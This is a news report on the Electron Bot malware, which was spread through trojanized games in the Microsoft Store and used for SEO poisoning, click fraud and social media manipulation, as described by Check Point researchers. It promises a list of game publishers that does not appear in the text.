More than 5,000 Windows workstations in Sweden, Bulgaria, Russia, Bermuda, and Spain have been infected by a new malware capable of manipulating social media accounts that were spread via Microsoft’s official app store in the shape of Trojanized gaming programs. The malware was called “Electron Bot” by Israeli cybersecurity firm Check Point, after a command-and-control (C2) domain used in recent attacks. The assailants’ identities are unknown, but research shows they may be based in Bulgaria.
In research released this week, Check Point’s Moshe Marelus noted, “Electron Bot is a modular SEO poisoning malware that is utilized for social media promotion and click fraud.” “It’s primarily distributed through the Microsoft Store platform, where it’s dumped from dozens of infected software, largely games, that the attackers are continually uploading.” The first hint of malicious behavior was detected in October 2018, when an ad clicker campaign was identified, with malware hidden in plain sight in the shape of a Google Photos app.
The malware is claimed to have gone through multiple revisions in the years afterward, giving it new features and evasive capabilities. The bot is designed to load payloads fetched from the C2 server at run time, making it harder to identify. It also uses the cross-platform Electron framework. “This allows the attackers to change the bots’ behavior and modify the malware’s payload at any time,” Marelus stated.
Electron Bot’s primary purpose is to open a hidden browser window to try to do SEO poisoning, create ad clicks, route traffic to YouTube and SoundCloud material, and advertise specific products in order to earn money from ad clicks or boost store rating for sales revenue. It also has features for managing social media accounts on Facebook, Google, and Sound Cloud, such as creating new accounts, signing in, and commenting on and liking other postings to boost views.
When people download one of the compromised applications like Temple Endless Runner 2, from the Microsoft Store, the application launches but also downloads and installs the next stage dropper via JavaScript. Before the dropper fetches the real bot malware, there are procedures to spot possible threat detection software from organizations like Kaspersky Lab, ESET, Norton Security, Webroot, Sophos, and F-Secure.
The following is a list of game producers that distributed malware-infected apps:
“Because the bot’s payload is loaded dynamically at each run time,” Marelus explained, “assailants can tweak the code and shift the bot’s behavior to serious risk.” “They may, for example, start a second stage and release fresh malware, such as ransomware or a RAT. This can all take place without the victim’s knowledge.”